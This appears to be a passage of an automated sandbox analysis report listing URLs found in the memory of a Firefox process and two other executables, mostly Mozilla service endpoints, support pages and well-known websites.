                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
                          Source: firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submitDISCOVERY_STREAM_IMPRESSION_STATSDISCOVERY_STREAM_PERSO
                          Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F9438A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                          Source: firefox.exe, 0000002F.00000002.3453979007.000001F942795000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466017028.000001F9437AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943734000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%Closing
                          Source: firefox.exe, 0000002F.00000002.3462736194.000001F94354D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 0000002F.00000002.3777834058.00001AB50B63E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.combug-1703186-rollout-http3-support-release-88-89extensions.langpacks
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3449451323.000001F93FF22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FCAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%spdfjs.previousHandler.alwaysAskBeforeHandling
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3437343071.000001F9328D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://activity-stream/lib/RecommendationProvi
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3745579192.00000DA622A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmpString found in binary or memory: https://mozilla.org/W
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940981000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                          Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3444990370.000001F93EEB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/Wikipedia
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/google-safeframe.html
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/shims/google-safeframe.htmlshims/mochitest-shim-3.jsexperiment-apis/
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 0000002F.00000002.3466017028.000001F943757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 0000002F.00000002.3446314030.000001F93F000000.00000002.00000001.00040000.00000017.sdmpString found in binary or memory: https://snippets.mozilla.com/show/
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_ke
                          Source: firefox.exe, 0000002F.00000002.3689565654.000001F94B46B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3584635396.000001F945EAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3652668486.000001F94AF1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user_convertPlainTextDocument
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://spocs.getpocket.com/user_convertPlainTextDocument_getReadingSpeedForLanguage
Source: firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000002F.00000002.3530700311.000001F944581000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944835000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000002F.00000003.3413609052.000001F944259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3502039099.000001F944259000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443955333.000001F93EAB0000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helptransitionState
Source: firefox.exe, 0000002F.00000002.3551249065.000001F944A03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B031000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3571108437.000001F944EA4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000002F.00000002.3640517520.000001F94AEC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeschrome://browser/content/mi
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: fc1511c233.exe, 0000001B.00000003.3316881366.0000000005E27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2614786623.0000000023E25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.3664339405.000001F94B053000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000002F.00000002.3460822132.000001F943280000.00000002.08000000.00040000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F9409FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3443090623.000001F93E1B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000002F.00000002.3779966490.00001BE444004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3446551118.000001F93F200000.00000002.00000001.00040000.00000018.sdmp | String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/Z
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2756268933.0000000023A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2729388458.0000000001639000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339866585.0000000005B32000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3339767750.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3442280011.000001F93E0AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000002F.00000002.3760375687.000016C370E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3363111385.000001F942931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3578317189.000001F944FE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/Fixes
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000002F.00000002.3652668486.000001F94AF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000003.2350384892.0000000001637000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247410102.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247315256.0000000005B70000.00000004.00000800.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000003.3247532490.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
